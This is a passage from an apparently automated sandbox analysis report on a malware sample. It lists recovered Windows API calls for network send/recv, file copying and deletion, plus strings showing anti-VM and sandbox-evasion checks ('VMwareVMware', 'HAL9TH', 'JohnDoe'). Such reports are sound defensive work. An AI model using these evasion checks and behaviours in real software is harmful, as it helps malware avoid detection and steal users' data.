                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,009CB2B7), ref: 009CD194
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,009CB2B7), ref: 009CD1AB
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,009CB2B7), ref: 009CD1C2
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,009CB2B7), ref: 009CD1D9
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00645000), ref: 009CD1F4
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,009CB2B7), ref: 009CD20B
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,009CB2B7), ref: 009CD222
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,009CB2B7), ref: 009CD239
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,009CB2B7), ref: 009CD250
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00645004), ref: 009CD26B
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,009CB2B7), ref: 009CD282
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00645008), ref: 009CD29D
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,009CB2B7), ref: 009CD2B4
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00644FF4), ref: 009CD2D3
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,009CB2B7), ref: 009CD2EA
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,009CB2B7), ref: 009CD301
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,009CB2B7), ref: 009CD318
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,009CB2B7), ref: 009CD32F
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,009CB2B7), ref: 009CD346
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,009CB2B7), ref: 009CD35D
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,009CB2B7), ref: 009CD374
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00644FFC), ref: 009CD44B
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,009CB2B7), ref: 009CD462
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,009CB2B7), ref: 009CD479
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,009CB2B7), ref: 009CD490
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00645014), ref: 009CD4AB
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00645018), ref: 009CD4C6
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,009CB2B7), ref: 009CD4DD
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,009CB2B7), ref: 009CD4F4
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,009CB2B7), ref: 009CD50B
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                                                  • String ID: B
                                                                                                                                                                                                                                                  • API String ID: 2238633743-3806887055
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 009C07F6: lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 009C083C
                                                                                                                                                                                                                                                    • Part of subcall function 009C07F6: strchr.MSVCRT ref: 009C0856
                                                                                                                                                                                                                                                    • Part of subcall function 009C07F6: strchr.MSVCRT ref: 009C086E
                                                                                                                                                                                                                                                    • Part of subcall function 009C07F6: lstrlen.KERNEL32(?), ref: 009C0882
                                                                                                                                                                                                                                                    • Part of subcall function 009C07F6: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 009C089A
                                                                                                                                                                                                                                                    • Part of subcall function 009C07F6: strcpy_s.MSVCRT ref: 009C0915
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,?), ref: 009C0989
                                                                                                                                                                                                                                                  • strcpy_s.MSVCRT ref: 009C09A4
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,?), ref: 009C09B0
                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,?,?,?,?), ref: 009C09BB
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?), ref: 009C09E3
                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?), ref: 009C09ED
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,?), ref: 009C09FD
                                                                                                                                                                                                                                                  • strcpy_s.MSVCRT ref: 009C0A19
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,?,?,?,?), ref: 009C0A25
                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?), ref: 009C0A30
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?), ref: 009C0A4B
                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?), ref: 009C0A55
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,?,?,?,?), ref: 009C0A65
                                                                                                                                                                                                                                                  • strcpy_s.MSVCRT ref: 009C0A81
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 009C0A91
                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?), ref: 009C0A9C
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?), ref: 009C0AAF
                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,?,?,?), ref: 009C0AB9
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?), ref: 009C0ADA
                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?), ref: 009C0AE4
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,?), ref: 009C0AF4
                                                                                                                                                                                                                                                  • strcpy_s.MSVCRT ref: 009C0B12
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,?,?,?,?), ref: 009C0B1E
                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,00644E40,?,?,?,?,?,?), ref: 009C0B28
                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?), ref: 009C0B2F
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,?,?,?,?), ref: 009C0B42
                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,?,?), ref: 009C0B79
                                                                                                                                                                                                                                                  • strcpy_s.MSVCRT ref: 009C0BB1
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,00000000,00000000,?,?,?,?,?,?), ref: 009C0BC9
                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?), ref: 009C0BD4
                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(?,?,?,?,?,?,?), ref: 009C0BDB
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,?,?,?,?), ref: 009C0BEE
                                                                                                                                                                                                                                                  • strcpy_s.MSVCRT ref: 009C0C07
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 009C0C0F
                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 009C0C1A
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 009C0C45
                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 009C0C4F
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 009C0C5F
                                                                                                                                                                                                                                                  • strcpy_s.MSVCRT ref: 009C0C7B
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 009C0C87
                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,00644E40), ref: 009C0C92
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?), ref: 009C0D35
                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 009C0D3F
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,?), ref: 009C0D76
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,?,?,?,?), ref: 009C0D83
                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,00644E40,?,?,?), ref: 009C0D8D
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,?,?,?,?), ref: 009C0DD6
                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?), ref: 009C0DE1
                                                                                                                                                                                                                                                  • memcpy.MSVCRT(?,?,?), ref: 009C0E16
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Heap$Process$Free$strcpy_s$lstrlen$strchr$memcpy
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3553499935-0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 009C2631: memcpy.MSVCRT(?,009C25B6,?,?,00000000,?,009C25B6,?,?,009C25EF,?,?,009C25B6,?,?,?), ref: 009C267E
                                                                                                                                                                                                                                                  • WSAStartup.WS2_32(00000202,?), ref: 009B9E62
                                                                                                                                                                                                                                                  • socket.WS2_32(00000002,00000001,00000006), ref: 009B9E72
                                                                                                                                                                                                                                                  • getaddrinfo.WS2_32(00000000,00000000,?,?), ref: 009B9ECE
                                                                                                                                                                                                                                                  • closesocket.WS2_32(00000000), ref: 009B9ED9
                                                                                                                                                                                                                                                  • WSACleanup.WS2_32 ref: 009B9EDF
                                                                                                                                                                                                                                                  • htons.WS2_32(00000000), ref: 009B9F52
                                                                                                                                                                                                                                                  • FreeAddrInfoW.WS2_32(?), ref: 009B9F6A
                                                                                                                                                                                                                                                  • connect.WS2_32(00000000,?,00000010), ref: 009B9F74
                                                                                                                                                                                                                                                  • strlen.MSVCRT ref: 009BA026
                                                                                                                                                                                                                                                  • memmove.MSVCRT(00000000,00000000,?), ref: 009BA0C4
                                                                                                                                                                                                                                                  • memmove.MSVCRT(?,00000000,?,?,00000000,000000FF), ref: 009BA12B
                                                                                                                                                                                                                                                  • memmove.MSVCRT(00000000,00000000,?,006439EB,?,00000000,000000FF), ref: 009BA1B3
                                                                                                                                                                                                                                                  • memmove.MSVCRT(?,00000000,?,?,00000000,000000FF,006439EB,?,00000000,000000FF), ref: 009BA21A
                                                                                                                                                                                                                                                  • memmove.MSVCRT(00000000,00000000,?,?,?,?,?,?,006439AB,?,00000000,000000FF,006439EB,?,00000000,000000FF), ref: 009BA2E6
                                                                                                                                                                                                                                                    • Part of subcall function 009C28D9: memcpy.MSVCRT(?,?,0000000F,?,00000000,00000000,?,00000000,?,009B9B1F,00000000,?,00000000,?,?,00000000), ref: 009C2932
                                                                                                                                                                                                                                                  • memmove.MSVCRT(?,00000000,?,?,00000000,000000FF,?,?,?,?,?,006439AB,?,00000000,000000FF,006439EB), ref: 009BA35B
                                                                                                                                                                                                                                                  • memmove.MSVCRT(00000000,00000000,?,0064398A,?,00000000,000000FF,?,?,?,?,?,006439AB,?,00000000,000000FF), ref: 009BA417
                                                                                                                                                                                                                                                  • send.WS2_32(00000000,00000000,?,00000000), ref: 009BA4BD
                                                                                                                                                                                                                                                  • recv.WS2_32(00000000,?,00001000,00000000), ref: 009BA4DC
                                                                                                                                                                                                                                                  • rand.MSVCRT ref: 009BA551
                                                                                                                                                                                                                                                  • rand.MSVCRT ref: 009BA55A
                                                                                                                                                                                                                                                  • rand.MSVCRT ref: 009BA563
                                                                                                                                                                                                                                                  • rand.MSVCRT ref: 009BA56C
                                                                                                                                                                                                                                                  • closesocket.WS2_32(00000000), ref: 009BA5AB
                                                                                                                                                                                                                                                  • WSACleanup.WS2_32 ref: 009BA5B1
                                                                                                                                                                                                                                                    • Part of subcall function 009C2593: strlen.MSVCRT ref: 009C25A1
                                                                                                                                                                                                                                                  • send.WS2_32(000000FF,?,?,00000000), ref: 009BA6D9
                                                                                                                                                                                                                                                  • recv.WS2_32(000000FF,?,00001000,00000000), ref: 009BA726
                                                                                                                                                                                                                                                    • Part of subcall function 009C2DE9: memset.MSVCRT ref: 009C2E31
                                                                                                                                                                                                                                                  • memmove.MSVCRT(?,?,?,?,?,?,?,?,?), ref: 009BA89B
                                                                                                                                                                                                                                                  • send.WS2_32(000000FF,?,?,00000000), ref: 009BA92A
                                                                                                                                                                                                                                                  • closesocket.WS2_32(000000FF), ref: 009BA931
                                                                                                                                                                                                                                                  • WSACleanup.WS2_32 ref: 009BA937
                                                                                                                                                                                                                                                  • closesocket.WS2_32(000000FF), ref: 009BA98D
                                                                                                                                                                                                                                                  • WSACleanup.WS2_32 ref: 009BA993
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: memmove$Cleanupclosesocketrand$send$memcpyrecvstrlen$AddrFreeInfoStartupconnectgetaddrinfohtonsmemsetsocket
                                                                                                                                                                                                                                                  • String ID: :
                                                                                                                                                                                                                                                  • API String ID: 703715170-336475711
                                                                                                                                                                                                                                                  • Opcode ID: 978f3084348ff5871f820b77ddbc49b661c548069cd3dc5d3495d8df9675ee71
                                                                                                                                                                                                                                                  • Instruction ID: cfc4fba1217d76a217461e927259d43e644966f9f632e1bb32f433cbd1611ab5
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 978f3084348ff5871f820b77ddbc49b661c548069cd3dc5d3495d8df9675ee71
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D782F0706083809FD334EF24C944BABBBE5AFD5310F14492DE4898B392DBB59949CB93
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: %hu/%hu/$%hu/%hu/%hu$CreateDC$CreateDCA$CryptStringToBinaryA$DISPLAY$DISPLAY$GetDevic$GetDeviceCaps$GetUserN$GetUserNameA$HAL9TH$JohnDoe$JohnDoe$NtQueryInformationProcess$ReleaseD$ReleaseDC$VMwareVM$VMwareVMware$crypt32.$crypt32.dll$gdi32.dl$gdi32.dll$ntdll.dl$ntdll.dll$sscanf$user32.d$user32.dll
                                                                                                                                                                                                                                                  • API String ID: 0-2179091496
                                                                                                                                                                                                                                                  • Opcode ID: 3d03c016c40e7bf2fefc509958d87a2e635967e32702d11625f5e8fc5cb7fd27
                                                                                                                                                                                                                                                  • Instruction ID: 86e27b9bdcb8569573e06bdff851749a70f31a48c5ecb8a307c45d2392953fab
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3d03c016c40e7bf2fefc509958d87a2e635967e32702d11625f5e8fc5cb7fd27
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2A712861818BC58ED712CF24AD187563FE3AB5B348F08725EC8541E2B6D7FA0089C7D9
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • memmove.MSVCRT(00000000,00000000,?,006439EB,?,00000000,000000FF), ref: 009BA1B3
                                                                                                                                                                                                                                                  • memmove.MSVCRT(?,00000000,?,?,00000000,000000FF,006439EB,?,00000000,000000FF), ref: 009BA21A
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: memmove
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2162964266-0
                                                                                                                                                                                                                                                  • Opcode ID: fcee40670d18bfa8b55c131fba8c64f0c996933fe92a8a7a89a6ae439863f39c
                                                                                                                                                                                                                                                  • Instruction ID: 086259b2d22bd2bfe3b2a397170b43d534d73a5dc43c13f1e7bea2724f7834f4
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fcee40670d18bfa8b55c131fba8c64f0c996933fe92a8a7a89a6ae439863f39c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6912DF709083809FC324DF64D991BABBBE5AFC5310F54492DF4CA8B292DB75A909CB53
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • lstrcpyA.KERNEL32(?,?), ref: 004200A2
                                                                                                                                                                                                                                                  • strlen.MSVCRT ref: 0042011F
                                                                                                                                                                                                                                                    • Part of subcall function 0041FB48: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0041FB8B
                                                                                                                                                                                                                                                    • Part of subcall function 0041FB48: SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?), ref: 0041FBBC
                                                                                                                                                                                                                                                    • Part of subcall function 0041F988: ??_V@YAXPAX@Z.MSVCRT(?,?,?,00000001,?,?,00420362,?,00000001), ref: 0041F9AA
                                                                                                                                                                                                                                                    • Part of subcall function 0041F988: ??_U@YAPAXI@Z.MSVCRT(?,?,?,00000001,?,?,00420362,?,00000001), ref: 0041F9BC
                                                                                                                                                                                                                                                    • Part of subcall function 0041F988: memcpy.MSVCRT(?,?,?,?,?,00000001,?,?,00420362,?,00000001), ref: 0041F9CD
                                                                                                                                                                                                                                                    • Part of subcall function 0041F988: memcpy.MSVCRT(?,?,?,?,?,00000001,?,?,00420362,?,00000001), ref: 0041FA11
                                                                                                                                                                                                                                                    • Part of subcall function 0041F988: WriteFile.KERNEL32(?,?,?,?,00000000,?,?,00000001,?,?,00420362,?,00000001), ref: 0041FA2D
                                                                                                                                                                                                                                                  • lstrcpyA.KERNEL32(?,0042EEFC,?,?), ref: 004201C3
                                                                                                                                                                                                                                                  • lstrcpyA.KERNEL32(?,?), ref: 004201D5
                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(?), ref: 004201DF
                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,00645162), ref: 00420219
                                                                                                                                                                                                                                                  • lstrcpyA.KERNEL32(?,0042EEFC,00000000), ref: 00420238
                                                                                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 00420676
                                                                                                                                                                                                                                                  • GetDesktopWindow.USER32 ref: 0042067E
                                                                                                                                                                                                                                                  • srand.MSVCRT ref: 00420687
                                                                                                                                                                                                                                                  • rand.MSVCRT ref: 0042069B
                                                                                                                                                                                                                                                  • ??_U@YAPAXI@Z.MSVCRT(?,?,00000001,?,00000001,?,00000001,?,00000001,?,00000001,?,00000001,?,00000001,?), ref: 004208EC
                                                                                                                                                                                                                                                  • memcpy.MSVCRT(00000000,?,?), ref: 004208FE
                                                                                                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000360), ref: 00420912
                                                                                                                                                                                                                                                  • memcpy.MSVCRT(00000000,?,00000360), ref: 0042091F
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: lstrcpymemcpy$File$Pointer$??2@CountDesktopTickWindowWritelstrcatlstrlenrandsrandstrlen
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3082602272-0
                                                                                                                                                                                                                                                  • Opcode ID: 15cc0c2050461c285af5a59739b3565dc7628d347b5c94367d8e110c7e1f2880
                                                                                                                                                                                                                                                  • Instruction ID: 8471b57ff9ca47bc0cbb98eb1f71a8ac035a9bb11ea19f14e781d6706823b61e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 15cc0c2050461c285af5a59739b3565dc7628d347b5c94367d8e110c7e1f2880
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5572A674208394AFC711AF259894BAFBFE9AF96304F44049EF4C94B343C6399946CB76
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _mbscpy$FileFindstrcmpstrlenwsprintf$CloseFirstFolderOperationPath_splitpathisupper
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 260673504-0
                                                                                                                                                                                                                                                  • Opcode ID: 9de74252184d4e92245189a4cf74812e0976ee0e09d85f25a583efaa8448754d
                                                                                                                                                                                                                                                  • Instruction ID: e6ecd3275dc28bab13b93c7583a33c8cfb7888907ac144467030418babc37574
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9de74252184d4e92245189a4cf74812e0976ee0e09d85f25a583efaa8448754d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C6516DB2C083846ED321DB30AC46B9B3BFDDF92308F44156DF95492251EBB59548C3A7
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • lstrcpy.KERNEL32(?,?), ref: 009D0309
                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(?), ref: 009D0446
                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,00645162), ref: 009D0480
                                                                                                                                                                                                                                                  • lstrcpy.KERNEL32(?,0042EEFC), ref: 009D049F
                                                                                                                                                                                                                                                    • Part of subcall function 009CFDAF: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 009CFDF2
                                                                                                                                                                                                                                                    • Part of subcall function 009CFDAF: SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?), ref: 009CFE23
                                                                                                                                                                                                                                                    • Part of subcall function 009CFBEF: ??_U@YAPAXI@Z.MSVCRT(00000000), ref: 009CFC23
                                                                                                                                                                                                                                                    • Part of subcall function 009CFBEF: memcpy.MSVCRT(?,?,?,?,?,00000001,?,?,009D05C9,?,00000001), ref: 009CFC34
                                                                                                                                                                                                                                                    • Part of subcall function 009CFBEF: memcpy.MSVCRT(?,?,?), ref: 009CFC78
                                                                                                                                                                                                                                                    • Part of subcall function 009CFBEF: WriteFile.KERNEL32(?,?,?,?,00000000,?,?,00000001,?,?,009D05C9,?,00000001), ref: 009CFC94
                                                                                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 009D08DD
                                                                                                                                                                                                                                                  • GetDesktopWindow.USER32 ref: 009D08E5
                                                                                                                                                                                                                                                  • srand.MSVCRT ref: 009D08EE
                                                                                                                                                                                                                                                  • rand.MSVCRT ref: 009D0902
                                                                                                                                                                                                                                                  • ??_U@YAPAXI@Z.MSVCRT(?,?,00000001,?,00000001,?,00000001,?,00000001,?,00000001,?,00000001,?,00000001,?), ref: 009D0B53
                                                                                                                                                                                                                                                  • memcpy.MSVCRT(00000000,?,?), ref: 009D0B65
                                                                                                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000360), ref: 009D0B79
                                                                                                                                                                                                                                                  • memcpy.MSVCRT(00000000,?,00000360), ref: 009D0B86
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: memcpy$File$Pointerlstrcpy$??2@CountDesktopTickWindowWritelstrcatlstrlenrandsrand
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1984286156-0
                                                                                                                                                                                                                                                  • Opcode ID: 0de04a429b108b3094ed54c2502a3bbd25c40d52149ebe7d8a02eda4e25a9bc7
                                                                                                                                                                                                                                                  • Instruction ID: 90f676071d5fe4d2e9a111606d256d81ec0ccb6a07885b51cee430de6cbc6246
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0de04a429b108b3094ed54c2502a3bbd25c40d52149ebe7d8a02eda4e25a9bc7
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AF7284246093949FCB61AF25C8A5B6F7FAAAFD6340F0444ADF8C94B343D7349905CB62
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 0041370E: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,004073A7,0042EEFC), ref: 00413732
                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(00000000,?,?,?,\*.*,0042EEFC), ref: 0040D891
                                                                                                                                                                                                                                                    • Part of subcall function 00413860: lstrlenA.KERNEL32(?,?,?,?,?,00407506,?,------,?,?,?,?,00000014), ref: 00413879
                                                                                                                                                                                                                                                    • Part of subcall function 00413860: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,00407506,?,------,?,?,?,?,00000014), ref: 004138A2
                                                                                                                                                                                                                                                    • Part of subcall function 00413860: lstrcatA.KERNEL32(00000000,?,?,00407506,?,------,?,?,?,?,00000014), ref: 004138AA
                                                                                                                                                                                                                                                    • Part of subcall function 004137C0: lstrcpyA.KERNEL32(00000000,?,?,?,?,004074B1,?,?,?,?,00000014), ref: 004137F8
                                                                                                                                                                                                                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040DC89
                                                                                                                                                                                                                                                  • DeleteFileA.KERNEL32(00000000,00000000), ref: 0040DD67
                                                                                                                                                                                                                                                  • FindNextFileA.KERNEL32(?), ref: 0040DDA0
                                                                                                                                                                                                                                                  • FindClose.KERNEL32(?), ref: 0040DDB1
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: File$Findlstrcpy$CloseCopyDeleteFirstNextlstrcatlstrlen
                                                                                                                                                                                                                                                  • String ID: \*.*$q:d$q:d$q:d
                                                                                                                                                                                                                                                  • API String ID: 124472186-1383382868
                                                                                                                                                                                                                                                  • Opcode ID: cb5de748d47e18521a663841614ad92215ed0099e6ebd374e2969049b16209e8
                                                                                                                                                                                                                                                  • Instruction ID: fd5909e8a48491a8fe3474c087fdb49959fee0d6d26b23eadbfe979ac181219e
